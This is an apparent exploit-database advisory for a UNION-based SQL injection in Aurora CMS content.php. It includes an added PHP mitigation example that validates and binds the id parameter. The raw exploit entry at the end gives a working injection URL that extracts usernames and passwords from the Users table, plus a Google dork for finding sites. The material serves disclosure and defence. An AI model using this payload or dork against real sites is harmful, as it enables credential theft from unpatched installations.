Vendor: Aurora CMS
By: Sora
CVSS: 8.8 (HIGH)
Type: UNION statement SQL injection
CWE: 89
Product Name: Aurora CMS
Affected Version From: 1
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:aurora_cms:aurora_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows and Linux
Year: 2009

Aurora CMS Remote SQL Injection Exploit [content.php]

Aurora CMS is vulnerable to remote SQL injection in content.php. The injection is of the UNION statement type.

Mitigation:

Validate and sanitize user-supplied input, such as the id parameter of content.php, before it is used in SQL queries, to prevent SQL injection attacks.
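
One way to apply this to the id parameter of content.php, as an added example that is not Aurora CMS code or part of the advisory. The content table, its columns and the function names are assumptions, and an in-memory SQLite database with constructed rows stands in for the CMS database.

```php
<?php
declare(strict_types=1);

// Added example. Only the "id" parameter and the Users(Username, Password)
// table come from the advisory; everything else here is an assumption.

/** Accept only a positive decimal integer; anything else is rejected. */
function parse_content_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Look up one content row with a bound parameter, never by concatenation. */
function fetch_content(PDO $db, string $rawId): ?array
{
    $id = parse_content_id($rawId);
    if ($id === null) {
        return null; // caller answers 400/404 without touching the database
    }
    $stmt = $db->prepare('SELECT id, title, body FROM content WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database standing in for the CMS schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec('CREATE TABLE Users (Username TEXT, Password TEXT)');
$db->exec("INSERT INTO content VALUES (5, 'About', 'About us')");
$db->exec("INSERT INTO Users VALUES ('admin', 'constructed-hash')");

// The id value from the advisory's request, URL-decoded ("+" becomes a space).
$advisoryId = '-5 UNION SELECT ALL 1,2,3,4,'
    . 'group_concat(Username,0x3a,Password) from Users--';

// A legitimate id, the advisory's value, and an id with trailing SQL.
foreach (['5', $advisoryId, '5 OR 1=1'] as $raw) {
    $row = fetch_content($db, $raw);
    $result = $row === null ? 'rejected' : 'served: ' . $row['title'];
    printf("%-12.12s -> %s\n", $raw, $result);
}
```

The integer check rejects the request before any SQL runs, and the bound parameter keeps the query text fixed even if the check is later loosened.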

Exploit-DB raw data:

# Exploit Title: Aurora CMS Remote SQL Injection Exploit [content.php]
# Date: December 22nd, 2009
# Author: Sora
# Software Link: http://www.auroracms.com.au/
# Version: 1.0, 2.0, and 3.0
# Tested on: Windows and Linux
------------------------------------------------
> Aurora CMS Remote SQL Injection Exploit
> Vulnerability in: content.php
> Found and disclosed by: Sora
> Contact: vhr95zw [at] hotmail.com

> Google dork: "Aurora CMS"

Aurora CMS suffers a remote SQL injection exploit in content.php.

The type is UNION statement SQL injection.

# Code: http://www.site.com/content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users--

# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!